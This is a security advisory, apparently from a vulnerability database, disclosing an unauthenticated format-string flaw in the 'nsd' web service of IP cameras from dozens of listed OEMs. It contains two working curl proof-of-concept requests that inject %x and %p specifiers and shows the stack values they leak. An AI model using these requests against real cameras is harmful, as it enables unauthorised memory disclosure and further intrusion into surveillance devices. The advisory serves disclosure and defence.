nsd Format String

2017.12.18
Credit: bashis
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-134

[STX] Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day -[ PoC ]- 1) $ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB' [...] function initHideWidget(){ document.getElementById("devip").value = "192.168.57.20"; document.getElementById("cameraid").value = 1; document.getElementById("streamid").value = 1; document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069"; document.getElementById("lg").value = "BBBB"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; document.getElementById("ismotorize").value = 1; [...] Note: 'BBBB' are hiding within '5e3006db' 2) curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p" [...] function initHideWidget(){ document.getElementById("ip").value = "192.168.57.20"; document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; [...] -[ Affected OEM ]- Huatu I-View IP Camera Web Service Stanley Security 3D Eyes CCTV Platform Protech Srl LS vision GWSECU 12 Legion Solution HDVuk IP Camera Intervid Security Suzuki Tech Wellsite IP Camera iBrido Protec IP Camera Maxtron IP Camera Ascendent GTvs IP Camera Squilla Bikal IP Camera MW Power Alfa Vision KMA Security Tough Dog Security Kpro HQ Lanetwork AFM Vision ZetaDo Jobsight Inc. Datalab IP Technologies 4Tvision Proline UK Tanz Aisonic HD-IP PreSec Security Solution EagleVision Elemis Delta Imenara Gigamedia Xavee Honeywell Boss Security A.R.T Surveillance Global Security Securicorp Securetech Vapplica Star Stic NeXus Alnet Spy Smart Kompsos Adler Security Systems Nextan Access Toprotect Kawah LS StrateX Senpei CCTV Metcom AFM Vision Doron Technologies Saviour Smart IoT Systems Eagle-Eye Faucon.at BlueEagle Security Campro Opple Level One Video and Monitor System K&D [ETX]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top